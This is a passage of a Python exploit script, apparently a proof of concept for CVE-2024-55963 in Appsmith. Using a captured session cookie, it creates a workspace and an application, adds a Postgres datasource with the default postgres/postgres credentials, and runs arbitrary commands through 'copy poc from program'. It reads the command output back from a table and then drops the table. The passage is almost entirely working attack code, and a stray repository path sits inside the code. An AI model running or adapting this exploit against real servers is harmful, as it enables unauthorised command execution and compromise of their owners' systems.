"Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", "X-Requested-By": "Appsmith", "Connection": "keep-alive", "Referer": f"{base_url}/applications", "Cookie": f"{cookie_name}={cookie_value}", # Use the captured session cookie } fourth_request_data = json.dumps({"name": "Untitled workspace 3"}) fourth_response = requests.post(fourth_request_url, headers=fourth_request_headers, data=fourth_request_data) fourth_response.raise_for_status() # Extract the 'id' from the response if it exists try: response_json = fourth_response.json() workspace_id = response_json.get("data", {}).get("id") except ValueError: print("Response content is not valid JSON:", fourth_response.text) # Print the raw response for debugging if workspace_id: fifth_request_url = f"{base_url}/api/v1/applications" fifth_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", "X-Requested-By": "Appsmith", "Content-Length": "161", "Origin": base_url, "Connection": "keep-alive", "Referer": f"{base_url}/applications?workspaceId={workspace_id}", "Cookie": f"{cookie_name}={cookie_value}", } fifth_request_data = json.dumps({"workspaceId":workspace_id,"name":"Untitled application 2","color":"#E3DEFF","icon":"chinese-remnibi","positioningType":"FIXED","showNavbar":None}) print('Creating a new application...') fifth_response = requests.post(fifth_request_url, headers=fifth_request_headers, data=fifth_request_data) fifth_response.raise_for_status() try: response_json = fifth_response.json() application_id = response_json.get("data", {}).get("id") except ValueError: print("Response content is not valid JSON:", fifth_response.text) # Sixth request to get workspace details if workspace_id: sixth_request_url = f"{base_url}/api/v1/workspaces/{workspace_id}" sixth_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "x-anonymous-user-id": "8e91142e-ea5a-4725-91b6-439e8bd0abc1", "Connection": "keep-alive", "Referer": f"{base_url}/app/untitled-application-2/page1-67294f8c2f2a476b7cdc6e20/edit", "Cookie": f"{cookie_name}={cookie_value}", } print('Getting workspace details...') sixth_response = requests.get(sixth_request_url, headers=sixth_request_headers) sixth_response.raise_for_status() # Extract all plugin IDs from the response try: response_json = sixth_response.json() plugin_ids = [plugin.get("pluginId") for plugin in response_json.get("data", {}).get("plugins", [])] # Loop through each plugin ID for the seventh request print(f'Searching for vulnerable postgres database...') for plugin_id in plugin_ids: # Seventh request to get the form data for the plugin seventh_request_url = f"{base_url}/api/v1/plugins/{plugin_id}/form" seventh_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "x-anonymous-user-id": "8e91142e-ea5a-4725-91b6-439e8bd0abc1", "Connection": "keep-alive", "Referer": f"{base_url}/app/untitled-application-2/page1-67294f8c2f2a476b7cdc6e20/edit/datasources/NEW", "Cookie": f"{cookie_name}={cookie_value}", } try: seventh_response = requests.get(seventh_request_url, headers=seventh_request_headers) seventh_response.raise_for_status() # Extracting the port value from the seventh response try: seventh_response_json = seventh_response.json() if 'data' in seventh_response_json and 'form' in seventh_response_json['data']: form_data = seventh_response_json['data']['form'] if any("postgres" in str(item) for item in form_data): print(f"Vulnerable postgres database found.") break else: pass except (ValueError, IndexError) as e: pass except requests.exceptions.HTTPError as e: print(f"Error checking plugin {plugin_id}: {e}") continue # Proceed to request 8 after finding "postgres" # Proceed to request 8 after finding "postgres" if "postgres" in str(seventh_response_json): try: # Try the environments API endpoint eighth_request_url = f"{base_url}/api/v1/environments/workspaces/{workspace_id}?fetchDatasourceMeta=true" eighth_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "x-anonymous-user-id": "8e91142e-ea5a-4725-91b6-439e8bd0abc1", "Connection": "keep-alive", "Referer": f"{base_url}/app/untitled-application-2/page1-67294f8c2f2a476b7cdc6e20/edit", "Cookie": f"{cookie_name}={cookie_value}", } print('Getting the workspace details...') eighth_response = requests.get(eighth_request_url, headers=eighth_request_headers) eighth_response.raise_for_status() # Extracting the workspace ID from the eighth response try: eighth_response_json = eighth_response.json() workspace_data = eighth_response_json.get("data", [{}])[0] workspace_id_value = workspace_data.get("id") except (ValueError, IndexError): print("Response content is not valid JSON or does not contain the expected structure:", eighth_response.text) except requests.exceptions.HTTPError as e: # If the environments API fails, use the workspace ID we already have print(f"Could not fetch environment details: {e}") print("Using existing workspace ID for datasource creation...") workspace_id_value = workspace_id except (ValueError, IndexError): print("Response content is not valid JSON or does not contain enough plugins:", sixth_response.text) # After the eighth request to get workspace details if workspace_id_value: ninth_request_url = f"{base_url}/api/v1/datasources" ninth_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", "X-Requested-By": "Appsmith", "x-anonymous-user-id": "8e91142e-ea5a-4725-91b6-439e8bd0abc1", "Origin": base_url, "Connection": "keep-alive", "Referer": f"{base_url}/app/untitled-application-2/page1-67294f8c2f2a476b7cdc6e20/edit/datasource/temp-id-0?from=datasources&pluginId=671a669f4e7fe242d9885195", "Cookie": f"{cookie_name}={cookie_value}", } ninth_request_data = { "pluginId": plugin_id, "datasourceStorages": { workspace_id_value: { "datasourceConfiguration": { "properties": [None, {"key": "Connection method", "value": "STANDARD"}], "connection": { "mode": "READ_WRITE", "ssl": {"authType": "DEFAULT"} }, "endpoints": [{"port": "5432", "host": "localhost"}], "sshProxy": {"endpoints": [{"port": "22"}]}, "authentication": { "databaseName": "postgres", "username": "postgres", "password": "postgres" } }, "datasourceId": "", "environmentId": workspace_id_value, "isConfigured": True } }, "name": "Untitled datasource 1", "workspaceId": workspace_id } print('Connecting to vulnerable postgres database...') ninth_response = requests.post(ninth_request_url, headers=ninth_request_headers, json=ninth_request_data) ninth_response.raise_for_status() # Extracting the ID from the response try: ninth_response_json = ninth_response.json() datasource_id = ninth_response_json.get("data", {}).get("id") except (ValueError, KeyError): print("Response content is not valid JSON or does not contain the expected structure:", ninth_response.text) # After the ninth request to create the datasource if datasource_id: # 10th Request tenth_request_url = f"{base_url}/api/v1/datasources/{datasource_id}/schema-preview" tenth_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", "X-Requested-By": "Appsmith", "x-anonymous-user-id": "017a0261-6296-4852-88a1-d557bd478fb2", "Origin": base_url, "Connection": "keep-alive", "Referer": f"{base_url}/app/untitled-application-1/page1-670056b59e810d6d78f0f7dc/edit/datasource/67005e8f9e810d6d78f0f7e3", "Cookie": f"{cookie_name}={cookie_value}", } tenth_request_data = { "title": "SELECT", "body": "create table poc (column1 TEXT);", "suggested": True } print("Creating the table 'poc'...") tenth_response = requests.post(tenth_request_url, headers=tenth_request_headers, json=tenth_request_data) tenth_response.raise_for_status() # 11th Request eleventh_request_url = f"{base_url}/api/v1/datasources/{datasource_id}/schema-preview" eleventh_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", "X-Requested-By": "Appsmith", "x-anonymous-user-id": "017a0261-6296-4852-88a1-d557bd478fb2", "Origin": base_url, "Connection": "keep-alive", "Referer": f"{base_url}/app/untitled-application-1/page1-670056b59e810d6d78f0f7dc/edit/datasource/67005e8f9e810d6d78f0f7e3", "Cookie": f"{cookie_name}={cookie_value}", } eleventh_request_data = { "title": "SELECT", "body": f"copy poc from program '{command_arg}';", "suggested": True }/CVE-2024-55963-Appsmith-RCE print("Running command...") eleventh_response = requests.post(eleventh_request_url, headers=eleventh_request_headers, json=eleventh_request_data) eleventh_response.raise_for_status() # 12th Request twelfth_request_url = f"{base_url}/api/v1/datasources/{datasource_id}/schema-preview" # Use the datasource_id twelfth_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", "X-Requested-By": "Appsmith", "x-anonymous-user-id": "017a0261-6296-4852-88a1-d557bd478fb2", # Use your actual anonymous user ID "Origin": base_url, "Connection": "keep-alive", "Referer": f"{base_url}/app/untitled-application-1/page1-670056b59e810d6d78f0f7dc/edit/datasource/67005e8f9e810d6d78f0f7e3", "Cookie": f"{cookie_name}={cookie_value}", # Use the captured session cookie } # Request body for the 12th schema preview twelfth_request_data = { "title": "SELECT", "body": "select * from poc;", "suggested": True } # Print statement before the 12th request print("Reading command output from poc table...\n") # Make the POST request for the 12th schema preview twelfth_response = requests.post(twelfth_request_url, headers=twelfth_request_headers, json=twelfth_request_data) # Extracting and printing the response from the 12th schema preview try: twelfth_response_json = twelfth_response.json() # Extracting the specific data body_data = twelfth_response_json.get("data", {}).get("body", []) column1_values = [item.get("column1") for item in body_data] # Extract only the column1 values print("Command output:") print("----------------------------------------") for value in column1_values: print(value) # Print each column1 value print("----------------------------------------\n") except (ValueError, KeyError): print("Response content is not valid JSON or does not contain the expected structure:", twelfth_response.text) # Print the raw response for debugging # Cleanup Request cleanup_request_url = f"{base_url}/api/v1/datasources/{datasource_id}/schema-preview" # Use the datasource_id cleanup_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", "X-Requested-By": "Appsmith", "x-anonymous-user-id": "017a0261-6296-4852-88a1-d557bd478fb2", # Use your actual anonymous user ID "Origin": base_url, "Connection": "keep-alive", "Referer": f"{base_url}/app/untitled-application-1/page1-670056b59e810d6d78f0f7dc/edit/datasource/67005e8f9e810d6d78f0f7e3", "Cookie": f"{cookie_name}={cookie_value}", # Use the captured session cookie } # Request body for cleanup cleanup_request_data = { "title": "SELECT", "body": "DROP TABLE poc;", # Command to drop the table "suggested": True } # Make the POST request for the cleanup print('\nDropping the table...') cleanup_response = requests.post(cleanup_request_url, headers=cleanup_request_headers, json=cleanup_request_data)